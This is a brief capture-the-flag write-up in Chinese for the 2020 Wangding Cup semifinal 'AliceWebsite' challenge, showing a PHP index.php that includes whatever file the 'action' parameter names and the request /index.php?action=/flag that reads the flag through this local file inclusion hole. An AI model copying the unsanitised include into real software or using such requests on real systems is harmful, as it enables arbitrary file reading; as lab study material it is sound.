[网鼎杯 2020 半决赛]AliceWebsite.md

<?php
$action = (isset($_GET['action']) ? $_GET['action'] : 'home.php');
if (file_exists($action)) {
	include $action;
} else {
	echo "File not found!";
}
?>

index.php中存在文件包含漏洞

/index.php?action=/flag

#Web #PHP #文件包含